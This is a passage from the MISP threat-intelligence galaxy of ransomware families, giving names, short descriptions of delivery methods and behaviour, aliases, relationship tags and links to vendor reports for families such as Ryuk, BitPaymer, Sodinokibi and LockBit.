Over 100,000 thousand computers in China have been infected in just a few days with poorly-written ransomware that encrypts local files and steals credentials for multiple Chinese online services. The crooks show a screen titled UNNAMED1989 and demand the victim a ransom of 110 yuan ($16) in exchange for decrypting the files, payable via Tencent’s WeChat payment service by scanning a QR code.

The tag is: misp-galaxy:ransomware="WeChat Ransom"

WeChat Ransom is also known as:

  • UNNAMED1989

Table 8524. Table References

Links

https://www.bleepingcomputer.com/news/security/ransomware-infects-100k-pcs-in-china-demands-wechat-payment/

https://www.bleepingcomputer.com/news/security/chinese-police-arrest-dev-behind-unnamed1989-wechat-ransomware/

Dablio Ransomware

The tag is: misp-galaxy:ransomware="Dablio Ransomware"

Dablio Ransomware has relationships with:

  • similar: misp-galaxy:ransomware="HolyCrypt" with estimative-language:likelihood-probability="likely"

Table 8526. Table References

Links

https://twitter.com/struppigel/status/1069905624954269696

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-7th-2018-wechat-ransomware-scammers-and-more/

Gerber Ransomware 3.0

The tag is: misp-galaxy:ransomware="Gerber Ransomware 3.0"

EQ Ransomware

GrujaRS discovered the EQ Ransomware that drops a ransom note named README_BACK_FILES.htm and uses .f**k (censored) as its extension for encrypted files. May be GlobeImposter.

The tag is: misp-galaxy:ransomware="EQ Ransomware"

Table 8530. Table References

Links

https://twitter.com/GrujaRS/status/1071349228172124160

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-december-14th-2018-slow-week/

https://www.youtube.com/watch?v=uHYY6XZZEw4

Mercury Ransomware

extension ".Mercury", note "!!!READ_IT!!!.txt" with 4 different 64-char hex as ID, 3 of which have dashes. Possible filemarker, same in different victim’s files.

The tag is: misp-galaxy:ransomware="Mercury Ransomware"

Table 8531. Table References

Links

https://twitter.com/demonslay335/status/1072164314608480257

Forma Ransomware

The tag is: misp-galaxy:ransomware="Forma Ransomware"

Forma Ransomware is also known as:

  • FORMA

Table 8532. Table References

Links

https://twitter.com/GrujaRS/status/1072468548977680385

Djvu

The tag is: misp-galaxy:ransomware="Djvu"

Table 8533. Table References

Links

https://twitter.com/demonslay335/status/1072907748155842565

Ryuk ransomware

Similar to Samas and BitPaymer, Ryuk is specifically used to target enterprise environments. Code comparison between versions of Ryuk and Hermes ransomware indicates that Ryuk was derived from the Hermes source code and has been under steady development since its release. Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors. However, Ryuk is only used by GRIM SPIDER and, unlike Hermes, Ryuk has only been used to target enterprise environments. Since Ryuk’s appearance in August, the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD.

The tag is: misp-galaxy:ransomware="Ryuk ransomware"

Table 8534. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

BitPaymer

In August 2017, a new ransomware variant identified as BitPaymer was reported to have ransomed the U.K.’s National Health Service (NHS), with a high ransom demand of 53 BTC (approximately $200,000 USD). The targeting of an organization rather than individuals, and the high ransom demands, made BitPaymer stand out from other contemporary ransomware at the time. Though the encryption and ransom functionality of BitPaymer was not technically sophisticated, the malware contained multiple anti-analysis features that overlapped with Dridex. Later technical analysis of BitPaymer indicated that it had been developed by INDRIK SPIDER, suggesting the group had expanded its criminal operation to include ransomware as a monetization strategy.

The tag is: misp-galaxy:ransomware="BitPaymer"

BitPaymer is also known as:

  • FriedEx

  • IEncrypt

Table 8535. Table References

Links

https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/

LockerGoga

The tag is: misp-galaxy:ransomware="LockerGoga"

LockerGoga has relationships with:

  • similar: misp-galaxy:ransomware="Nodera Ransomware" with estimative-language:likelihood-probability="roughly-even-chance"

Table 8536. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lockergoga-ransomware-allegedly-used-in-altran-attack/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

Princess Evolution

We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. On August 1, we found Rig’s traffic stream dropping a then-unknown ransomware. Delving into this seemingly new ransomware, we checked its ransom payment page in the Tor network and saw it was called Princess Evolution (detected by Trend Micro as RANSOM_PRINCESSLOCKER.B), and was actually a new version of the Princess Locker ransomware that emerged in 2016. Based on its recent advertisement in underground forums, it appears that its operators are peddling Princess Evolution as a ransomware as a service (RaaS) and are looking for affiliates. The new malvertising campaign we observed since July 25 is notable in that the malvertisements included Coinhive (COINMINER_MALXMR.TIDBF). Even if users aren’t diverted to the exploit kit and infected with the ransomware, the cybercriminals can still earn illicit profit through cryptocurrency mining. Another characteristic of this new campaign is that they hosted their malvertisement page on a free web hosting service and used domain name system canonical name (DNS CNAME) to map their advertisement domain on a malicious webpage on the service.

The tag is: misp-galaxy:ransomware="Princess Evolution"

Princess Evolution is also known as:

  • PrincessLocker Evolution

Table 8537. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-as-a-service-princess-evolution-looking-for-affiliates/

Jokeroo

A new Ransomware-as-a-Service called Jokeroo is being promoted on underground hacking sites and via Twitter that allows affiliates to allegedly gain access to a fully functional ransomware and payment server. According to a malware researcher named Damian, the Jokeroo RaaS first started promoting itself as a GandCrab Ransomware RaaS on the underground hacking forum Exploit.in.

The tag is: misp-galaxy:ransomware="Jokeroo"

Jokeroo is also known as:

  • Fake GandCrab

Table 8538. Table References

Links

https://www.bleepingcomputer.com/news/security/jokeroo-ransomware-as-a-service-offers-multiple-membership-packages/

GlobeImposter

During December 2017, a new variant of the GlobeImposter Ransomware was detected for the first time and reported on malware-traffic-analysis. At first sight this ransomware looks very similar to other ransomware samples and uses common techniques such as process hollowing. However, deeper inspection showed that like LockPoS, which was analyzed by CyberBit, GlobeImposter too bypasses user-mode hooks by directly invoking system calls. Given this evasion technique is being leveraged by new malware samples may indicate that this is a beginning of a trend aiming to bypass user-mode security products.

The tag is: misp-galaxy:ransomware="GlobeImposter"

Table 8539. Table References

Links

https://www.fortinet.com/blog/threat-research/analysis-of-new-globeimposter-ransomware-variant.html

BlackWorm

BlackWorm Ransomware is a malicious computer infection that encrypts your files, and then does everything it can to prevent you from restoring them. It needs you to pay $200 for the decryption key, but there is no guarantee that the people behind this infection would really issue the decryption tool for you.

The tag is: misp-galaxy:ransomware="BlackWorm"

Table 8540. Table References

Links

https://spyware-techie.com/blackworm-ransomware-removal-guide

Tellyouthepass

Tellyouthepass is a ransomware that alters system files, registry entries and encodes personal photos, documents, and servers or archives. Army-grade encryption algorithms get used to change the original code of the file and make the data useless.

The tag is: misp-galaxy:ransomware="Tellyouthepass"

Table 8541. Table References

Links

https://malware.wikia.org/wiki/Tellyouthepass

BigBobRoss

BigBobRoss ransomware is the cryptovirus that requires a ransom in Bitcoin to return encrypted files marked with .obfuscated appendix.

The tag is: misp-galaxy:ransomware="BigBobRoss"

Table 8542. Table References

Links

https://www.2-spyware.com/remove-bigbobross-ransomware.html

Planetary

First discovered by malware security analyst, Lawrence Abrams, PLANETARY is an updated variant of another high-risk ransomware called HC7.

The tag is: misp-galaxy:ransomware="Planetary"

Table 8543. Table References

Links

https://www.pcrisk.com/removal-guides/12121-planetary-ransomware

Cr1ptT0r

Cr1ptT0r Ransomware Targets NAS Devices with Old Firmware.

The tag is: misp-galaxy:ransomware="Cr1ptT0r"

Cr1ptT0r is also known as:

  • Criptt0r

  • Cr1pt0r

  • Cripttor

Table 8544. Table References

Links

https://www.coveware.com/blog/2019/3/13/cr1ptt0r-ransomware-targets-nas-devices-with-old-firmware

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r

Sodinokibi

Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called "Sodinokibi." Sodinokibi attempts to encrypt data in a user’s directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco’s Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.

The tag is: misp-galaxy:ransomware="Sodinokibi"

Sodinokibi is also known as:

  • REvil

  • Revil

Table 8545. Table References

Links

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

Phobos

Phobos exploits open or poorly secured RDP ports to sneak inside networks and execute a ransomware attack, encrypting files and demanding a ransom be paid in bitcoin for returning the files, which in this case are locked with a .phobos extension.

The tag is: misp-galaxy:ransomware="Phobos"

Phobos is also known as:

  • Java NotDharma

Table 8546. Table References

Links

https://www.zdnet.com/article/new-phobos-ransomware-exploits-weak-security-to-hit-targets-around-the-world/

GetCrypt

A new ransomware is in the dark market which encrypts all the files on the device and redirects victims to the RIG exploit kit.

The tag is: misp-galaxy:ransomware="GetCrypt"

Table 8547. Table References

Links

https://www.ehackingnews.com/2019/05/getcrypt-ransomware-modus-operandi-and.html

Nemty

A new ransomware family dubbed “Nemty” for the extension it adds to encrypted files has recently surfaced in the wild. According to a report from Bleeping Computer, New York-based reverse engineer Vitali Kremez posits that Nemty is possibly delivered through exposed remote desktop connections.

The tag is: misp-galaxy:ransomware="Nemty"

Nemty has relationships with:

  • related-to: misp-galaxy:ransomware="Nefilim" with estimative-language:likelihood-probability="likely"

Table 8548. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/nemty-ransomware-possibly-spreads-through-exposed-remote-desktop-connections

Buran

Buran is a new version of the Vega ransomware strain (a.k.a. Jamper, Ghost, Buhtrap) that attacked accountants from February through April 2019. The new Buran ransomware first was discovered by nao_sec in June 2019, delivered by the RIG Exploit Kit, as reported by BleepingComputer.

The tag is: misp-galaxy:ransomware="Buran"

Table 8549. Table References

Links

https://www.acronis.com/en-us/blog/posts/meet-buran-new-delphi-ransomware-delivered-rig-exploit-kit

Hildacrypt

The Hildacrypt ransomware encrypts the victim’s files with a strong encryption algorithm and the filename extension .hilda until the victim pays a fee to get them back.

The tag is: misp-galaxy:ransomware="Hildacrypt"

Table 8550. Table References

Links

https://securitynews.sonicwall.com/xmlpost/hildacrypt-ransomware-actively-spreading-in-the-wild/

Mr.Dec

Mr. Dec ransomware is cryptovirus that was first spotted in mid-May 2018, and since then was updated multiple times. The ransomware encrypts all personal data on the device with the help of AES encryption algorithm and appends .[ID]random 16 characters[ID] file extension, preventing from their further usage.

The tag is: misp-galaxy:ransomware="Mr.Dec"

Mr.Dec is also known as:

  • MrDec

  • Sherminator

Table 8551. Table References

Links

https://www.2-spyware.com/remove-mr-dec-ransomware.html

https://id-ransomware.blogspot.com/2018/05/mrdec-ransomware.html

Freeme

Freezing crypto ransomware encrypts user data using AES, and then requires a ransom in # BTC to return the files. Original title: not indicated in the note. The file says: FreeMe.exe

The tag is: misp-galaxy:ransomware="Freeme"

Freeme is also known as:

  • Freezing

Table 8552. Table References

Links

http://id-ransomware.blogspot.com/2019/06/freeme-freezing-ransomware.html

DoppelPaymer

We have dubbed this new ransomware DoppelPaymer because it shares most of its code with the BitPaymer ransomware operated by INDRIK SPIDER. However, there are a number of differences between DoppelPaymer and BitPaymer, which may signify that one or more members of INDRIK SPIDER have split from the group and forked the source code of both Dridex and BitPaymer to start their own Big Game Hunting ransomware operation.

The tag is: misp-galaxy:ransomware="DoppelPaymer"

DoppelPaymer is also known as:

  • Pay OR Grief

  • BitPaymer

  • IEncrypt

  • FriedEx

Table 8553. Table References

Links

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer

Desync

This crypto ransomware encrypts enterprise LAN data with AES (ECB mode), and then requires a ransom in # BTC to return the files.

The tag is: misp-galaxy:ransomware="Desync"

Table 8554. Table References

Links

https://id-ransomware.blogspot.com/2019/01/unnamed-desync-ransomware.html

Maze

Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.

The tag is: misp-galaxy:ransomware="Maze"

Maze has relationships with:

  • related-to: misp-galaxy:ransomware="Ragnar Locker" with estimative-language:likelihood-probability="likely"

Table 8555. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maze

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/

https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us

Cyborg Ransomware

Ransomware delivered using fake Windows Update spam

The tag is: misp-galaxy:ransomware="Cyborg Ransomware"

Table 8556. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/fake-windows-update-spam-leads-to-cyborg-ransomware-and-its-builder/

FTCode

A targeted email campaign has been spotted distributing the JasperLoader to victims. While the JasperLoader was originally used to then install Gootkit, Certego has observed it now being used to infect victims with a new ransomware dubbed FTCODE. Using an invoice-themed email appearing to target Italian users, the attackers attempt to convince users to allow macros in a Word document. The macro is used to run PowerShell to retrieve additional PowerShell code.

The tag is: misp-galaxy:ransomware="FTCode"

Table 8557. Table References

Links

https://www.certego.net/en/news/malware-tales-ftcode/

https://exchange.xforce.ibmcloud.com/collection/FTCODE-Ransomware-45dacdc2d5cf30722ced20b9d37988c2

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode

Clop

Observed for the first time in Febuary 2019, variant from CryptoMix Family, itself a variation from CryptXXX and CryptoWall family

The tag is: misp-galaxy:ransomware="Clop"

Table 8558. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

PornBlackmailer

A new infection is being distributed by porn sites that tries to blackmail a victim into paying a ransom by stating they will tell law enforcement that the victim is spreading child porn. This is done by collecting information about the user, including screen shots of their active desktop, in order to catch them in compromising situations.

The tag is: misp-galaxy:ransomware="PornBlackmailer"

Table 8559. Table References

Links

https://www.bleepingcomputer.com/news/security/blackmailware-found-on-porn-site-threatens-to-report-users-are-spreading-child-porn/

KingOuroboros

This crypto-extortioner encrypts user data using AES, and then requires a $ 30- $ 50- $ 80 buy- back to BTC to return the files. The name is original. Written on AutoIt.

The tag is: misp-galaxy:ransomware="KingOuroboros"

Table 8560. Table References

Links

https://id-ransomware.blogspot.com/2018/06/kingouroboros-ransomware.html

MAFIA Ransomware

The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

The tag is: misp-galaxy:ransomware="MAFIA Ransomware"

MAFIA Ransomware is also known as:

  • Mafia

Table 8561. Table References

Links

https://bartblaze.blogspot.com/2018/08/mafia-ransomware-targeting-users-in.html

5ss5c Ransomware

The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named 5ss5c. […​] It will however only encrypt files with the following extensions: 7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip

The tag is: misp-galaxy:ransomware="5ss5c Ransomware"

Table 8562. Table References

Links

https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html

Nodera Ransomware

Nodera is a ransomware family that uses the Node.js framework and was discovered by Quick Heal researchers. The infection chain starts with a VBS script embedded with multiple JavaScript files. Upon execution, a directory is created and both the main node.exe program and several required NodeJS files are downloaded into the directory. Additionally, a malicious JavaScript payload that performs the encryption process is saved in this directory. After checking that it has admin privileges and setting applicable variables, the malicious JavaScript file enumerates the drives to create a list of targets. Processes associated with common user file types are stopped and volume shadow copies are deleted. Finally, all user-specific files on the C: drive and all files on other drives are encrypted and are appended with a .encrypted extension. The ransom note containing instructions on paying the Bitcoin ransom are provided along with a batch script to be used for decryption after obtaining the private key. Some mistakes in the ransom note identified by the researchers include the fact that it mentions a 2048-bit RSA public key instead of 4096-bit (the size that was actually used), a hard-coded private key destruction time dating back almost 2 years ago, and a lack of instructions for how the private key will be obtained after the ransom is paid. These are signs that the ransomware may be in the development phase and was likely written by an amateur. For more information, see the QuickHeal blog post in the Reference section below.

The tag is: misp-galaxy:ransomware="Nodera Ransomware"

Nodera Ransomware is also known as:

  • Nodera

Table 8563. Table References

Links

https://exchange.xforce.ibmcloud.com/collection/6f18908ce6d9cf4efb551911e00d9ec4

https://blogs.quickheal.com/first-node-js-based-ransomware-nodera/

MegaCortex

Discovered in May 2019. dropped throught networks compromised by trojan like Emotet or TrickBot. Tools and methods used are similar to LockerGoga

The tag is: misp-galaxy:ransomware="MegaCortex"

MegaCortex has relationships with:

  • similar: misp-galaxy:ransomware="LockerGoga" with estimative-language:likelihood-probability="roughly-even-chance"

Table 8564. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

RobinHood

Detected in April 2019. Known for paralyzing the cities of Baltimore and Greenville. Probably also exfiltrate data

The tag is: misp-galaxy:ransomware="RobinHood"

RobinHood is also known as:

  • HelpYemen

Table 8565. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

Bart ransomware

Bart ransomware is distributed by the same Russian Cyber Mafia behind Dridex 220 and Locky. Bart doesn’t communicate with a command and control (C&C) server, so it can encrypt files without being connected to a computer. Bart is spread to end users via phishing emails containing .zip attachments with JavaScript Code and use social engineering to trick users into opening the 'photo' attachments. The zipped files are obfuscated to make it more hard to tell what actions they are performing. See screenshot above for an example of what they look like. If opened, these attachments download and install the intermediary loader RockLoader which downloads Bart onto the machine over HTTPS. Once executed, it will first check the language on the infected computer. If the malware detects Russian, Belorussian, or Ukrainian, the ransomware will terminate and will not proceed with the infection. If it’s any other language, it will start scanning the computer for certain file extensions to encrypt. Because Bart does not require communication with C&C infrastructure prior to encrypting files, Bart could possibly encrypt machines sitting behind corporate firewalls that would otherwise block such traffic. Thus, organizations need to ensure that Bart is blocked at the email gateway using rules that block zipped executables.

The tag is: misp-galaxy:ransomware="Bart ransomware"

Bart ransomware is also known as:

  • Locky Bart

Table 8566. Table References

Links

https://www.knowbe4.com/bart-ransomware

Razor

Razor was discovered by dnwls0719, it is a part of Garrantydecrypt ransomware family. Like many other programs of this type, Razor is designed to encrypt files (make them unusable/inaccessible), change their filenames, create a ransom note and change victim’s desktop wallpaper. Razor renames files by appending the ".razor" extension to their filenames. For example, it renames "1.jpg" to "1.jpg.razor", and so on. It creates a ransom note which is a text file named "RECOVERY.txt", this file contains instructions on how to contact Razor’s developers (cyber criminals) and other details. As stated in the "RECOVERY.txt" file, this ransomware encrypts all files and information about how to purchase a decryption tool can be received by contacting Razor’s developers. Victims supposed to contact them via razor2020@protonmail.ch, Jabber client (razor2020@jxmpp.jp) or ICQ client (@razor2020) and wait for further instructions. It is very likely that they will name a price of a decryption tool and/or key and provide cryptocurrency wallet’s address that should be used to make a transaction. However, it is never a good idea to trust (pay) any cyber criminals/ransomware developers. It is common that they do not provide decryption tools even after a payment. Another problem is that ransomware-type programs encrypt files with strong encryption algorithms and their developers are the only ones who have tools that can decrypt files encrypted by their ransomware. In most cases victims have the only free and safe option: to restore files from a backup. Also, it is worth mentioning that files remain encrypted even after uninstallation of ransomware, its removal only prevents it from causing further encryptions.

The tag is: misp-galaxy:ransomware="Razor"

Table 8567. Table References

Links

https://www.pcrisk.com/removal-guides/17016-razor-ransomware

Wadhrama

The tag is: misp-galaxy:ransomware="Wadhrama"

Wadhrama has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="PARINACOTA" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="PARINACOTA" with estimative-language:likelihood-probability="likely"

Table 8568. Table References

Links

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=ransom:win32/wadhrama.c&ThreatID=2147730655

Mespinoza

Mespinoza ransomware is used at least since october 2018. First versions used the common extension ".locked". SInce december 2019 a new version in open sourced and documented, this new version uses the ".pyza" extension.

The tag is: misp-galaxy:ransomware="Mespinoza"

Mespinoza is also known as:

  • Pyza

  • Pysa

Table 8569. Table References

Links

https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-002.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf

CoronaVirus

A new ransomware called CoronaVirus has been distributed through a fake web site pretending to promote the system optimization software and utilities from WiseCleaner. With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan. This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.

The tag is: misp-galaxy:ransomware="CoronaVirus"

Table 8570. Table References

Links

https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/

Snake Ransomware

Snake ransomware first attracted the attention of malware analysts in January 2020 when they observed the crypto-malware family targeting entire corporate networks. Shortly after this discovery, the threat quieted down. It produced few new detected infections in the wild for the next few months. That was until May 4, when ID Ransomware registered a sudden spike in submissions for the ransomware.

The tag is: misp-galaxy:ransomware="Snake Ransomware"

Table 8571. Table References

Links

https://www.cybersecurity-insiders.com/meet-the-snake-ransomware-which-encrypts-all-connected-devices/

https://www.tripwire.com/state-of-security/security-data-protection/massive-spike-in-snake-ransomware-activity-attributed-to-new-campaign/

https://www.bleepingcomputer.com/news/security/large-scale-snake-ransomware-campaign-targets-healthcare-more/

eCh0raix

Anomali researchers have observed a new ransomware family, dubbed eCh0raix, targeting QNAP Network Attached Storage (NAS) devices. QNAP devices are created by the Taiwanese company QNAP Systems, Inc., and contain device storage and media player functionality, amongst others. The devices appear to be compromised by brute forcing weak credentials and exploiting known vulnerabilities in targeted attacks. The malicious payload encrypts the targeted file extensions on the NAS using AES encryption and appends .encrypt extension to the encrypted files. The ransom note created by the ransomware has the form shown below. eCh0raix was first seen in June 2019, after victims began reporting ransomware attacks in a forum topic on BleepingComputer. On June 1st, 2020, there has been a sudden surge of eCh0raix victims seeking help in our forums and submissions to the ransomware identification site ID-Ransomware.

The tag is: misp-galaxy:ransomware="eCh0raix"

Table 8572. Table References

Links

https://www.bleepingcomputer.com/news/security/ongoing-ech0raix-ransomware-campaign-targets-qnap-nas-devices/

https://www.anomali.com/blog/the-ech0raix-ransomware

Egregor

The threat group behind this malware seems to operate by hacking into companies, stealing sensitive data, and then running Egregor to encrypt all the files. According to the ransom note, if the ransom is not paid by the company within 3 days, and aside from leaking part of the stolen data, they will distribute via mass media where the company’s partners and clients will know that the company was attacked.

The tag is: misp-galaxy:ransomware="Egregor"

Egregor has relationships with:

  • variant-of: misp-galaxy:ransomware="Sekhmet" with estimative-language:likelihood-probability="likely"

Table 8573. Table References

Links

https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor

https://www.bleepingcomputer.com/news/security/crytek-hit-by-egregor-ransomware-ubisoft-data-leaked/

https://cybersecuritynews.com/egregor-ransomware/

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

SunCrypt

SunCrypt ransomware was discovered in October 2019 and in August 2020 it was added to Maze ransomware’s cartel. It also follows some of Maze’s tactics, techniques, and procedures. SunCrypt is launched and installed using an obfuscated PowerShell script. Infected email attachments (macros), torrent websites, malicious ads act as carriers for this ransomware.

The tag is: misp-galaxy:ransomware="SunCrypt"

SunCrypt is also known as:

  • Sun

  • Suncrypt

Table 8574. Table References

Links

https://www.acronis.com/en-us/blog/posts/suncrypt-adopts-attacking-techniques-netwalker-and-maze-ransomware

https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/

https://securityboulevard.com/2020/09/the-curious-case-of-suncrypt/

LockBit

LockBit operators tend to be very indiscriminate and opportunistic in their targeting. Actors behind this attack will use a variety of methods to gain initial access, up to and including basic methods such as brute force. After gaining initial access the actor follows a fairly typical escalation, lateral movement and ransomware execution playbook. LockBit operators tend to have a very brief dwell time, executing the final ransomware payload as quickly as they are able to. LockBit ransomware has the built-in lateral movement features; given adequate permissions throughout the targeted environment.

The tag is: misp-galaxy:ransomware="LockBit"

LockBit is also known as:

  • ABCD ransomware

LockBit has relationships with:

  • similar: misp-galaxy:ransomware="Lockbit3" with estimative-language:likelihood-probability="likely"

Table 8575. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/tales-from-the-trenches-a-lockbit-ransomware-story/

https://usa.kaspersky.com/resource-center/threats/lockbit-ransomware

WastedLocker

WastedLocker primarily targets corporate networks. Upon initial compromise, often using a fake browser update containing SocGholish, the actor then takes advantage of dual-use and LoLBin tools in an attempt to evade detection. Key observations include lateral movement and privilege escalation. The WastedLocker ransomware has been tied back to EvilCorp.

The tag is: misp-galaxy:ransomware="WastedLocker"

Table 8576. Table References

Links

https://blogs.cisco.com/security/talos/wastedlocker-goes-big-game-hunting-in-2020

https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

Babuk Ransomsware

Since this is the first detection of this malware in the wild, it’s not surprising that Babuk is not obsfuscated at all. Overall, it’s a pretty standard ransomware that utilizes some of the new techniques we see such as multi-threading encryption as well as abusing the Windows Restart Manager similar to Conti and REvil. For encrypting scheme, Babuk uses its own implementation of SHA256 hashing, ChaCha8 encryption, and Elliptic-curve Diffie–Hellman (ECDH) key generation and exchange algorithm to protect its keys and encrypt files. Like many ransomware that came before, it also has the ability to spread its encryption through enumerating the available network resources.

The tag is: misp-galaxy:ransomware="Babuk Ransomsware"

Table 8577. Table References

Links

http://chuongdong.com//reverse%20engineering/2021/01/03/BabukRansomware/

Darkside

Darkside, the latest ransomware operation to emerge has been attacking organizations beginning earlier this month. Darkside’s customized attacks on companies have already garnered them million-dollar payouts. Through their “press release”, these threat actors have claimed to be affiliated with prior ransomware operations making millions of dollars. They stated that they created this new product to match their needs, as prior products didn’t. Darkside explains that they only target companies they know that can pay the specified ransom. They have allegedly promised that they will not attack the following sectors. They include medicine, education, non-profit organizations, and the government sector.

The tag is: misp-galaxy:ransomware="Darkside"

Darkside is also known as:

  • BlackMatter

Table 8578. Table References

Links

https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/

https://www.wired.com/story/ransomware-gone-corporate-darkside-where-will-it-end/

https://darksidedxcftmqa.onion.foundation/

RansomEXX

We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems. After the initial analysis we noticed similarities in the code of the Trojan, the text of the ransom notes and the general approach to extortion, which suggested that we had in fact encountered a Linux build of the previously known ransomware family RansomEXX. This malware is notorious for attacking large organizations and was most active earlier this year. RansomEXX is a highly targeted Trojan. Each sample of the malware contains a hardcoded name of the victim organization. Moreover, both the encrypted file extension and the email address for contacting the extortionists make use of the victim’s name.

The tag is: misp-galaxy:ransomware="RansomEXX"

RansomEXX is also known as:

  • Ransom X

  • Defray777

  • Defray-777

  • Defray 2018

Table 8579. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx

https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html

https://github.com/Bleeping/Ransom.exx

https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/

https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4/

https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/

CovidLock

Mobile ransomware. The Zscaler ThreatLabZ team recently came across a URL named hxxp://coronavirusapp[.]site/mobile.html, which portrays itself as a download site for an Android app that tracks the coronavirus spread across the globe. In reality, the app is Android ransomware, which locks out the victim and asks for ransom to unlock the device. The app portrays itself as a Coronavirus Tracker. As soon as it starts running, it asks the user for several authorizations, including admin rights. In fact, this ransomware does not encrypt nor steal anything and only lock the device with an hard coded code.

The tag is: misp-galaxy:ransomware="CovidLock"

Table 8580. Table References

Links

https://www.zscaler.com/blogs/security-research/covidlock-android-ransomware-walkthrough-and-unlocking-routine

Tycoon

This malware is written in Java and is named after references in the code. Tycoon has been in the wild since December 2019 and has targeted organizations in the education, SMBs, and software industries. Tycoon is a multi-platform Java ransomware that targets Windows and Linux systems. This ransomware denies access to the system administrator following an attack on the domain controller and file servers. The initial intrusion occurs through an internet-facing remote desktop protocol (RDP) jump-server.

The tag is: misp-galaxy:ransomware="Tycoon"

Table 8581. Table References

Links

https://cyberflorida.org/threat-advisory/tycoon-ransomware/

https://usf.app.box.com/s/83xh0t5w99klrsoisorir7kgs14o972s

Ragnar Locker

Ragnar Locker is a ransomware identified in December 2019 that targetscorporate networks inBig Game Huntingtargeted attacks. This reportpresents recent elements regarding this ransomware.

The tag is: misp-galaxy:ransomware="Ragnar Locker"

Ragnar Locker is also known as:

  • RagnarLocker

Ragnar Locker has relationships with:

  • similar: misp-galaxy:mitre-malware="Ragnar Locker - S0481" with estimative-language:likelihood-probability="likely"

Table 8582. Table References

Links

https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/

